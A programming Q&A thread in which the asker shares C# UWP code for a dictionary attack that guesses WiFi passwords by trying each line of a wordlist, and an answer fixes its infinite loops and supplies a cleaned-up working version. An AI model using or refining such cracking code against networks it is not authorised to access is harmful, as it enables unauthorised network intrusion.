# UWP app crashes (but not all the time) during function execution

Tags: c#, uwp, wifi

I'm working on a proof of concept at the moment, just for fun (and for YouTube). The thing I am trying to prove is that I can efficiently "hack" WiFi passwords using UWP and C# for Windows. I don't know of any Wi-Fi cracking tools that are designed specifically for Windows 10 devices (PC, Tablet, XboxOne, Mobile etc)...

So I have actually managed to perform a dictionary style attack (on my own WiFi network of course). However my function seems to completely crash occasionally when running the "hack".

Please consider the fact that this is completely white hat hacking I am talking about here, nothing illegal is intended.

Any help with a reason why this crashes is appreciated...

```
    private async void connectWiFi_Tapped(object sender, TappedRoutedEventArgs e)
    {
        int success = 0;

        var picker = new FileOpenPicker();
        picker.ViewMode = PickerViewMode.Thumbnail;
        picker.SuggestedStartLocation = PickerLocationId.DocumentsLibrary;
        picker.FileTypeFilter.Add(".txt");

        StorageFile file = await picker.PickSingleFileAsync();
        if (file != null)
        {

            do
            {

                string _line;
                using (var inputStream = await file.OpenReadAsync())
                using (var classicStream = inputStream.AsStreamForRead())
                using (var streamReader = new StreamReader(classicStream))
                {
                    while (streamReader.Peek() >= 0)
                    {
                        if (success == 0)
                        {
                            _line = streamReader.ReadLine();

                            setConnectionStatus("Status: Checking WiFi network using passphrase " + _line);
                            if (await checkWifiPassword(_line) == true)
                            {
                                success = 1;
                                setConnectionStatus("SUCCESS: Password successfully identified as " + _line);
                                firstAdapter.Disconnect();
                                var msg = new MessageDialog(connectionStatus.Text);
                                await msg.ShowAsync();
                            }
                            else
                            {
                                success = 0;
                                setConnectionStatus("FAIL: Password " + _line + "is incorrect. Checking next password...");
                            }
                        }
                    }
                }

            } while (success == 0);
        }

    }
```

This is the code that actually runs a dictionary-style "hack" on a selected network. The code to actually connect to the network is as follows:

```
    private async Task<bool> checkWifiPassword(string passPhrase)
    {
        var credential = new PasswordCredential();

        WiFiReconnectionKind reconnectionKind = WiFiReconnectionKind.Manual;

        credential.Password = passPhrase;
        var selectedNetwork = null as WiFiNetworkDisplay;

        foreach (var network in ResultCollection)
        {
            if (WifiNetworks.SelectedItem.ToString() == network.Ssid)
            {
                selectedNetwork = network as WiFiNetworkDisplay;
            }
        }

        if (selectedNetwork != null)
        {
            var result = await firstAdapter.ConnectAsync(selectedNetwork.AvailableNetwork, reconnectionKind, credential);

            if (result.ConnectionStatus == WiFiConnectionStatus.Success)
            {
                return true;
            }
            else
            {
                return false;
            }
        }
        else
        {
            return false;
        }
    }
```

Does anyone have any idea what I am missing here?

Any help appreciated.

Thanks

Comment: Where exactly does it crash? What does the exception say?

Comment: There are no exceptions or errors, it just completely freezes as if it's performing a large task (but doesn't ever recover)

Comment: The following line: await msg.ShowAsync(); seems suspicious to me, what does it do exactly?

Comment: that shows a message dialog like the old MessageBox.ShowDialog("message text"); which was used in WinForms. awat msg.ShowAsync(); is the UWP equivalent to that

Comment: It might freeze if you're inside while loop on UI thread. Check who's calling connectWiFi_Tapped

Comment: connectWiFi_Tapped is called from the UI thread, it's a tapped event handler for a connect button. The user basically selects a wifi adaptor, selects a network to connect to and clicks connect, the app then calls a FilePicker dialog for the user to select a dictionary file to use for the "attack"

Answer (score 0):

## Consider this loop

```
                while (streamReader.Peek() >= 0)
                {
                    if (success == 0)
                    {
                        _line = streamReader.ReadLine();

                        setConnectionStatus("Status: Checking WiFi network using passphrase " + _line);
                        if (await checkWifiPassword(_line) == true)
                        {
                            success = 1;
                            setConnectionStatus("SUCCESS: Password successfully identified as " + _line);
                            firstAdapter.Disconnect();
                            var msg = new MessageDialog(connectionStatus.Text);
                            await msg.ShowAsync();
                        }
                        else
                        {
                            success = 0;
                            setConnectionStatus("FAIL: Password " + _line + "is incorrect. Checking next password...");
                        }
                    }
                }
```

**This can lead to and infinite loop:**

Imagine the following dictionary file:

```
abc
bcd
cde
```

where *abc* is the correct password.

1. You peek the stream, you get 97 (decimal ASCII for letter *a*), fine.
2. `Success` is 0, as we just started.
3. You read the next line.
4. You check the password, it works, cool.
5. **You set `success` to 1**, show the message, etc.
6. User closes the message dialog, `ShowAsync()` returns.
7. End of first loop iteration, let's start another one.
8. You peek the stream, you get 98 (ASCII for letter *b*), non 0, fine.
9. **Success is not zero, so we skip the entire body of that while**, end of second loop iteration.

   10. You peek the stream again, **the pointer did not move since the last peek**, so you're going to get that same 98 again.
   11. **And you skip again, infinite loop.**

### EDIT - there is actually another infinite loop there

I will not detail this that much, but take a look at the outer `do-while` loop. That loop runs until success. But if the inner loop exhausts all possibilities and does not find a correct password, `success` will remain `0`. That means the do while will run once again, the inner loop will go through the file again, which obviously will not find a solution again, and so on.

## Solution

There are many ways that code could be cleaned up, but the quick fix is to `break` after `msg.ShowAsync();`.

More details (that would belong to codereview.stackexchange.com):

Also I would not `Peek` the `StreamReader`. Use `EndOfStream` for that job. And you can skip the inner `if`, you simply break if you found a correct password. You can drop the outer loop as well. If you completed the inner loop without setting the `success` flag (which in turn should be a boolean) you can report to the user that no password worked.

I would do something along the lines of: (take it as a pseudo code, might not compile as it is)

```
private async void connectWiFi_Tapped(object sender, TappedRoutedEventArgs e)
{

    var picker = new FileOpenPicker();
    picker.ViewMode = PickerViewMode.Thumbnail;
    picker.SuggestedStartLocation = PickerLocationId.DocumentsLibrary;
    picker.FileTypeFilter.Add(".txt");

    StorageFile file = await picker.PickSingleFileAsync();
    if (file != null)
    {

        bool success = false;
        string _line;
        using (var inputStream = await file.OpenReadAsync())
        using (var classicStream = inputStream.AsStreamForRead())
        using (var streamReader = new StreamReader(classicStream))
        {
            while (!streamReader.EndOfStream)
            {
                _line = streamReader.ReadLine();

                setConnectionStatus("Status: Checking WiFi network using passphrase " + _line);
                if (await checkWifiPassword(_line) == true)
                {
                    success = true;
                    setConnectionStatus("SUCCESS: Password successfully identified as " + _line);
                    firstAdapter.Disconnect();
                    var msg = new MessageDialog(connectionStatus.Text);
                    await msg.ShowAsync();
                    break;
                }
                else
                {
                    setConnectionStatus("FAIL: Password " + _line + "is incorrect. Checking next password...");
                }
            }
        }
        if(!success){ /* report to the user*/ }
    }
```